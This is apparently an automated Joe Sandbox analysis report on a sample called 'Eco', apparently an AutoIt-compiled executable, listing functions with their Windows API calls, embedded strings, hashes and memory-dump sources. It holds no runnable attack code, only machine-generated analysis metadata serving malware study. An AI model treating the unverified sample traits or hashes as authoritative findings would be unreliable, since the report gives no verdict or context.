                          • Opcode Fuzzy Hash: 268c3d33db24594044ed4a3ea758872a9e1d343ea3429af0ae34dd0a94b99533
                          • Instruction Fuzzy Hash: 6291AF72418301AFCB519F64DC08E6B7BA9FF9A320F105A19F962961E0D731D948DF92
                          Function 00512FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(?,?,?), ref: 00513072
                          • DeleteObject.GDI32(00000000), ref: 005130B8
                          • DeleteObject.GDI32(00000000), ref: 005130C3
                          • DestroyIcon.USER32(00000000,?,?,?), ref: 005130CE
                          • DestroyWindow.USER32(00000000,?,?,?), ref: 005130D9
                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0054C6AC
                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0054C6E5
                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0054CB0E
                            • Part of subcall function 00511F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00512412,?,00000000,?,?,?,?,00511AA7,00000000,?), ref: 00511F76
                          • SendMessageW.USER32(?,00001053), ref: 0054CB4B
                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0054CB62
                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0054CB78
                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0054CB83
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                          • String ID: 0
                          • API String ID: 464785882-4108050209
                          • Opcode ID: 3eb591de292820d76951088ad40802cf73ec0a6d3a99c72ff35aca82c128b806
                          • Instruction ID: f0e99ae88a43e9bbcc86bc319686ba82b92f085d55b986819f1a2c94969a7507
                          • Opcode Fuzzy Hash: 3eb591de292820d76951088ad40802cf73ec0a6d3a99c72ff35aca82c128b806
                          • Instruction Fuzzy Hash: 2C12AB30601201EFDB64DF24C898BE9BFE1FF89308F544569E595CB2A2C731E986DB91
                          Function 005227FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                          • API String ID: 2660009612-1645009161
                          • Opcode ID: a2a4474161b1c1df3eb241aa0513090f1f91eab13546eea8f50e49c64f4b5a43
                          • Instruction ID: da6692a7beff8dfa340c6995e81bd81c5a86620271a116af2ca1cea86b16db01
                          • Opcode Fuzzy Hash: a2a4474161b1c1df3eb241aa0513090f1f91eab13546eea8f50e49c64f4b5a43
                          • Instruction Fuzzy Hash: D1A19F35A0021ABBCB14AF60EC56EAE7FB5BF86700F004429F905AB2D2EB70DE45D751
                          Function 0058795A Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(00000000), ref: 0058798D
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00587A4C
                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00587A8A
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00587A9C
                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00587AE2
                          • GetClientRect.USER32(00000000,?), ref: 00587AEE
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00587B32
                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00587B41
                          • GetStockObject.GDI32(00000011), ref: 00587B51
                          • SelectObject.GDI32(00000000,00000000), ref: 00587B55
                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00587B65
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00587B6E
                          • DeleteDC.GDI32(00000000), ref: 00587B77
                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00587BA3
                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00587BBA
                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00587BF5
                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00587C09
                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00587C1A
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00587C4A
                          • GetStockObject.GDI32(00000011), ref: 00587C55
                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00587C60
                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00587C6A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                          • API String ID: 2910397461-517079104
                          • Opcode ID: 9f722d35f9d3a053fc4af937b711d3736ad7172f6f026cb5130b254096d79305
                          • Instruction ID: 6e6e52d3c943777ece39ffccd1f00f09249c9b909671ce5fd9c17330285dc18f
                          • Opcode Fuzzy Hash: 9f722d35f9d3a053fc4af937b711d3736ad7172f6f026cb5130b254096d79305
                          • Instruction Fuzzy Hash: EFA1AEB1A40619BFEB24DBA4DC4AFAF7BA9FB59310F004105FA15A72E0D770AD05DB60
                          Function 0057B1C0 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0057B1CE
                          • GetDriveTypeW.KERNEL32(?,005A2C4C,?,\\.\,005A0980), ref: 0057B2AB
                          • SetErrorMode.KERNEL32(00000000,005A2C4C,?,\\.\,005A0980), ref: 0057B409
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ErrorMode$DriveType
                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                          • API String ID: 2907320926-4222207086
                          • Opcode ID: e99966474532d4b0e2502c08b90c181e92ca4d9e5f115efea2db94b59a55ea05
                          • Instruction ID: 4b69b9fc9b2251d4d8df39239c27c0369b8e14ebe76944b37e33f4638b40743c
                          • Opcode Fuzzy Hash: e99966474532d4b0e2502c08b90c181e92ca4d9e5f115efea2db94b59a55ea05
                          • Instruction Fuzzy Hash: 8151D334640216EF9B04EB54FD9AFBD7FA1FB85300B20C859E40AA7291D7B19D81EB41
                          Function 0059ACB7 Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetSysColor.USER32(00000012), ref: 0059ACF0
                          • SetTextColor.GDI32(?,?), ref: 0059ACF4
                          • GetSysColorBrush.USER32(0000000F), ref: 0059AD0A
                          • GetSysColor.USER32(0000000F), ref: 0059AD15
                          • CreateSolidBrush.GDI32(?), ref: 0059AD1A
                          • GetSysColor.USER32(00000011), ref: 0059AD32
                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0059AD40
                          • SelectObject.GDI32(?,00000000), ref: 0059AD51
                          • SetBkColor.GDI32(?,00000000), ref: 0059AD5A
                          • SelectObject.GDI32(?,?), ref: 0059AD67
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0059AD86
                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0059AD9D
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0059ADB2
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0059ADDA
                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0059AE01
                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0059AE1F
                          • DrawFocusRect.USER32(?,?), ref: 0059AE2A
                          • GetSysColor.USER32(00000011), ref: 0059AE38
                          • SetTextColor.GDI32(?,00000000), ref: 0059AE40
                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0059AE54
                          • SelectObject.GDI32(?,0059A9E7), ref: 0059AE6B
                          • DeleteObject.GDI32(?), ref: 0059AE76
                          • SelectObject.GDI32(?,?), ref: 0059AE7C
                          • DeleteObject.GDI32(?), ref: 0059AE81
                          • SetTextColor.GDI32(?,?), ref: 0059AE87
                          • SetBkColor.GDI32(?,?), ref: 0059AE91
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                          • String ID:
                          • API String ID: 1996641542-0
                          • Opcode ID: 87742a44c24fbbd7c387c7270b85c95446516d97efcd992a1963bdf8c1c784b0
                          • Instruction ID: d2dd568510db125d5266d4c65f7496f8114f917559f822f1c8dceb0918472eae
                          • Opcode Fuzzy Hash: 87742a44c24fbbd7c387c7270b85c95446516d97efcd992a1963bdf8c1c784b0
                          • Instruction Fuzzy Hash: A5514871910208AFDF119FA4DC48EAEBBB9FF09320F205615F915AB2E1D7719944EFA0
                          Function 00598DC2 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00598EAE
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00598EBF
                          • CharNextW.USER32(0000014E), ref: 00598EEE
                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00598F2F
                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00598F45
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00598F56
                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00598F73
                          • SetWindowTextW.USER32(?,0000014E), ref: 00598FC5
                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00598FDB
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 0059900C
                          • _memset.LIBCMT ref: 00599031
                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0059907A
                          • _memset.LIBCMT ref: 005990D9
                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00599103
                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 0059915B
                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00599208
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0059922A
                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00599274
                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005992A1
                          • DrawMenuBar.USER32(?), ref: 005992B0
                          • SetWindowTextW.USER32(?,0000014E), ref: 005992D8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                          • String ID: 0
                          • API String ID: 1073566785-4108050209
                          • Opcode ID: a3ef3ec07defb4b21910fba979e4d6812be1d3614b52ff1159fa8199698969c3
                          • Instruction ID: 8b071992b8a60b910795f86ee53dd086e5a59bbc0365807ae0e519865cfcee58
                          • Opcode Fuzzy Hash: a3ef3ec07defb4b21910fba979e4d6812be1d3614b52ff1159fa8199698969c3
                          • Instruction Fuzzy Hash: 0AE17C74900219AFDF209F54CC88AFE7FB8FF46714F10815AF915AA291DB708A85DF60
                          Function 00594C94 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetCursorPos.USER32(?), ref: 00594DCF
                          • GetDesktopWindow.USER32 ref: 00594DE4
                          • GetWindowRect.USER32(00000000), ref: 00594DEB
                          • GetWindowLongW.USER32(?,000000F0), ref: 00594E4D
                          • DestroyWindow.USER32(?), ref: 00594E79
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00594EA2
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00594EC0
                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00594EE6
                          • SendMessageW.USER32(?,00000421,?,?), ref: 00594EFB
                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00594F0E
                          • IsWindowVisible.USER32(?), ref: 00594F2E
                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00594F49
                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00594F5D
                          • GetWindowRect.USER32(?,?), ref: 00594F75
                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00594F9B
                          • GetMonitorInfoW.USER32(00000000,?), ref: 00594FB5
                          • CopyRect.USER32(?,?), ref: 00594FCC
                          • SendMessageW.USER32(?,00000412,00000000), ref: 00595037
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                          • String ID: ($0$tooltips_class32
                          • API String ID: 698492251-4156429822
                          • Opcode ID: 49cdcc68d33f8fa79334a3c3c5ef1e3dd7c30bb996fb82648f366ebbf59f5a0b
                          • Instruction ID: 5017fc1f5e65dc1ee55c55f7f821b2c6b72b9a2453439f37cf711e7759c4907b
                          • Opcode Fuzzy Hash: 49cdcc68d33f8fa79334a3c3c5ef1e3dd7c30bb996fb82648f366ebbf59f5a0b
                          • Instruction Fuzzy Hash: A1B15770608741AFDB04DF64C988E6ABBE4BB89314F008A18F5999B291D771EC45CF92
                          Function 005747F7 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                          Download Yara Rule
                          APIs
                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00574809
                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0057482F
                          • _wcscpy.LIBCMT ref: 0057485D
                          • _wcscmp.LIBCMT ref: 00574868
                          • _wcscat.LIBCMT ref: 0057487E
                          • _wcsstr.LIBCMT ref: 00574889
                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 005748A5
                          • _wcscat.LIBCMT ref: 005748EE
                          • _wcscat.LIBCMT ref: 005748F5
                          • _wcsncpy.LIBCMT ref: 00574920
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                          • API String ID: 699586101-1459072770
                          • Opcode ID: b904aac502b31fdf1dfdf84e2268797f24b9502638f814c37123611492fad93a
                          • Instruction ID: 6020802b4833e90426bc2833b6718bf8d278da8d826b4a31cf39a658ea7902fa
                          • Opcode Fuzzy Hash: b904aac502b31fdf1dfdf84e2268797f24b9502638f814c37123611492fad93a
                          • Instruction Fuzzy Hash: FB412972A002067BD714B7749C4BEBF7FACFF81720F004459F905A71D2EB349A01AAA5
                          Function 00512BA9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00512C8C
                          • GetSystemMetrics.USER32(00000007), ref: 00512C94
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00512CBF
                          • GetSystemMetrics.USER32(00000008), ref: 00512CC7
                          • GetSystemMetrics.USER32(00000004), ref: 00512CEC
                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00512D09
                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00512D19
                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00512D4C
                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00512D60
                          • GetClientRect.USER32(00000000,000000FF), ref: 00512D7E
                          • GetStockObject.GDI32(00000011), ref: 00512D9A
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00512DA5
                            • Part of subcall function 00512714: GetCursorPos.USER32(?), ref: 00512727
                            • Part of subcall function 00512714: ScreenToClient.USER32(005D67B0,?), ref: 00512744
                            • Part of subcall function 00512714: GetAsyncKeyState.USER32(00000001), ref: 00512769
                            • Part of subcall function 00512714: GetAsyncKeyState.USER32(00000002), ref: 00512777
                          • SetTimer.USER32(00000000,00000000,00000028,00511473), ref: 00512DCC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                          • String ID: AutoIt v3 GUI$hZ
                          • API String ID: 1458621304-3588766029
                          • Opcode ID: 567934f0dd291dab4d4f5ace76c02a39edf19776648764993df4c2cb38fc4145
                          • Instruction ID: dcee2e26ea784791c4091a9809e865c58fa149bca74651d700bf377a9fb7d641
                          • Opcode Fuzzy Hash: 567934f0dd291dab4d4f5ace76c02a39edf19776648764993df4c2cb38fc4145
                          • Instruction Fuzzy Hash: 62B17D71A0120AAFEB14DFA8CC45BED7FA4FB58314F10462AFA15A72D0DB74A891DF50
                          Function 00530354 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 348COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          • GetForegroundWindow.USER32(005A0980,?,?,?,?,?), ref: 0053040E
                          • IsWindow.USER32(?), ref: 005664A0
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$Foreground_memmove
                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                          • API String ID: 3828923867-1919597938
                          • Opcode ID: 00d26cf9fe8e38c30c0faf95c52001cf0c7a2e554aa7b08d886b36558b1f8a87
                          • Instruction ID: bcf0fddbb1e20c75f3a9eec37a3de38fde136480dc80536e69a14c8e4a6ab331
                          • Opcode Fuzzy Hash: 00d26cf9fe8e38c30c0faf95c52001cf0c7a2e554aa7b08d886b36558b1f8a87
                          • Instruction Fuzzy Hash: 30D1B130104703AFCB08EF60D5959AABFA4BFA5344F405A1DF456936E2DB30ED69CB92
                          Function 005941E7 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 00594274
                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00594334
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharMessageSendUpper
                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                          • API String ID: 3974292440-719923060
                          • Opcode ID: 8c08ad16a0b269c1d0850cb0084300a7343452640fe45233fdaa1498cd5491e8
                          • Instruction ID: 7fded28d69543a0e4deb4517892808b7ff4ef4fa22ec4705a17294549f5913b7
                          • Opcode Fuzzy Hash: 8c08ad16a0b269c1d0850cb0084300a7343452640fe45233fdaa1498cd5491e8
                          • Instruction Fuzzy Hash: C1A16A702147029FDF14EF60C856E6ABBA9BFC5314F105968B86A9B2D2DB70EC46CF41
                          Function 0056AF1D Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetClassNameW.USER32(?,?,00000100), ref: 0056AF5E
                          • __swprintf.LIBCMT ref: 0056AFFF
                          • _wcscmp.LIBCMT ref: 0056B012
                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0056B067
                          • _wcscmp.LIBCMT ref: 0056B0A3
                          • GetClassNameW.USER32(?,?,00000400), ref: 0056B0DA
                          • GetDlgCtrlID.USER32(?), ref: 0056B12C
                          • GetWindowRect.USER32(?,?), ref: 0056B162
                          • GetParent.USER32(?), ref: 0056B180
                          • ScreenToClient.USER32(00000000), ref: 0056B187
                          • GetClassNameW.USER32(?,?,00000100), ref: 0056B201
                          • _wcscmp.LIBCMT ref: 0056B215
                          • GetWindowTextW.USER32(?,?,00000400), ref: 0056B23B
                          • _wcscmp.LIBCMT ref: 0056B24F
                            • Part of subcall function 0053378E: _iswctype.LIBCMT ref: 00533796
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
